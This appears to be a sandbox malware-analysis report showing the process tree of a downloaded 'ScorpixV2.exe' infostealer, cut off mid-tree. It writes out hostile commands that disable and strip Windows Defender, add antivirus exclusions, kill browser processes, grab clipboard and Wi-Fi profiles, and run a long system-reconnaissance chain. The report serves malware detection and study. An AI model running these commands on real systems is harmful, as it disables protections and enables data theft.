PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88
PID 3948 wrote to memory of 4020	3948	msedge.exe	88

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6092	attrib.exe
6076	attrib.exe
2032	attrib.exe
3648	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://scorpix.fr
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb62dd46f8,0x7ffb62dd4708,0x7ffb62dd4718
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6304 /prefetch:8
  2⤵
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,15612522544205841015,10525669915580596313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4144
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:3936
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3672
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:1900
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"
      4⤵
      PID:1636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:1520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:2744
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        
        PID:5228
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:5140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:4032
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        7⤵
        
        PID:5920
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        8⤵
        
        PID:1424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        7⤵
        
        PID:6068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:5084
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:5220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        7⤵
        
        PID:4880
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        8⤵
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:3672
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:4380
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:6008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:5732
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:5988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"
        7⤵
        
        PID:5820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3948
        8⤵
        Kills process with taskkill
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"
        7⤵
        
        PID:5320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3028
        8⤵
        Kills process with taskkill
        
        PID:64
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"
        7⤵
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3468
        8⤵
        Kills process with taskkill
        
        PID:5836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"
        7⤵
        
        PID:5372
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 800
        8⤵
        Kills process with taskkill
        
        PID:1176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"
        7⤵
        
        PID:5440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4020
        8⤵
        Kills process with taskkill
        
        PID:5420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"
        7⤵
        
        PID:5568
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3496
        8⤵
        Kills process with taskkill
        
        PID:5632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"
        7⤵
        
        PID:3028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1752
        8⤵
        Kills process with taskkill
        
        PID:5900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"
        7⤵
        
        PID:5924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4000
        8⤵
        Kills process with taskkill
        
        PID:5644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"
        7⤵
        
        PID:1128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2552
        8⤵
        Kills process with taskkill
        
        PID:5336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"
        7⤵
        
        PID:3756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2180
        8⤵
        Kills process with taskkill
        
        PID:5592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        7⤵
        
        PID:5620
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        8⤵
        
        PID:536
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:5272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        7⤵
        
        PID:6072
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        8⤵
        
        PID:5936
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:5944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:5460
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:5084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        7⤵
        Clipboard Data
        
        PID:5856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        8⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3064
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        7⤵
        Network Service Discovery
        
        PID:5364
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:5440
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        8⤵
        
        PID:2428
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        8⤵
        Collects information from the system
        
        PID:5268
        
        C:\Windows\system32\net.exe
        
        net user
        8⤵
        
        PID:6140
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        9⤵
        
        PID:5664
        
        C:\Windows\system32\query.exe
        
        query user
        8⤵
        
        PID:5784
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        9⤵
        
        PID:5680
        
        C:\Windows\system32\net.exe
        
        net localgroup
        8⤵
        
        PID:5392
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        9⤵
        
        PID:5244
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        8⤵
        
        PID:4584
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        9⤵
        
        PID:5848
        
        C:\Windows\system32\net.exe
        
        net user guest
        8⤵
        
        PID:5636
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        9⤵
        
        PID:5384
        
        C:\Windows\system32\net.exe
        
        net user administrator
        8⤵
        
        PID:1176
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        9⤵
        
        PID:64
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        8⤵
        
        PID:3188
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        8⤵
        Enumerates processes with tasklist
        
        PID:3168
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        8⤵
        Gathers network information
        
        PID:1752
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        8⤵
        
        PID:5460
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        8⤵
        Network Service Discovery
        
        PID:3456
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        8⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4000
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        8⤵
        Launches sc.exe
        
        PID:2264
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4760
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:2940
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:3844
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:5492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5260
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5492
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5508
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:2772
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:5140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4752
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:796
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
      4⤵
      PID:5828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5384
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5444
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:6072
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5172
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5184
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1912
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:64
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3832
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5460
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:5588
  - - C:\Windows\system32\cmd.exe
